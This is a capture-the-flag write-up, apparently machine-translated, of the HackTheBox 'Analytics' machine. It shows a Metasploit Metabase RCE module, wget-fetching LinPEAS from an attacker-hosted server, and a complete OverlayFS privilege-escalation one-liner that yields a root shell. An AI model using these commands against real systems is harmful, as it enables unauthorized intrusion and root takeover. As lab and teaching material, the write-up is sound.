HTB Analytics. Escalating privileges with CVE-2023-32629
Greetings, kulhatzkers. Today’s write-up will be dedicated to hacking
Linux – machines with HackTheBox entitled Analytics.
Disclaimer: all utilities and techniques demonstrated in the article are provided for educational purposes.
Scanning and reconnaissance
As always, we start with scanning to identify active services.
nmap -sC -sV -Pn -p- -T4 10.10.11.234
Getting primary access using Metasploit
Based on the scan results, you can see that a web service is hanging on port 80. Let’s try to go to the web page:
This is Metabase. After surfing the Internet, we’ll find an exploit for it. The vulnerability has an ID CVE-2023-38646 and leads to remote code execution. Just what you need to get initial access. The exploit can be found at: GitHuband in Metasploit. Personally, I’ll run the exploit in Metasploit:
use exploit/linux/http/metabase_setup_token_rce
To further advance, we need to throw it on the car LinPEAS to discover ways to escalate privileges. Therefore, we will launch it on our OS python3 http.server
and through wget
download the script we need:
python3 -m http.server 80
wget http://10.10.16.68/linpeas.sh
Let’s launch LinPEAS:
bash ./linpeas.sh
After working, the script will find the credentials for connecting via SSH:
Let’s connect to the machine using ssh
:
ssh metalytics@10.10.11.233
The flag will be located here user.txt
Privilege escalation
Let’s run it in the same way python3 http.server
let’s throw it over wget
LinPEAS and run it on the machine:
After working out the script, we will determine the version of Ubuntu and find one for it vulnerability to escalate privileges. Or you can determine the OS version using cat /etc/os-release
. Privilege escalation vulnerability is due to module implementation discrepancies OverlayFS in the Linux kernel. OverlayFS is a pooled mount file system implementation that has been targeted by attackers due to the ability to gain unprivileged access through user namespaces and the presence of easily exploitable bugs. Let’s copy the load from the exploit and run it to escalate privileges:
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'
The car has passed!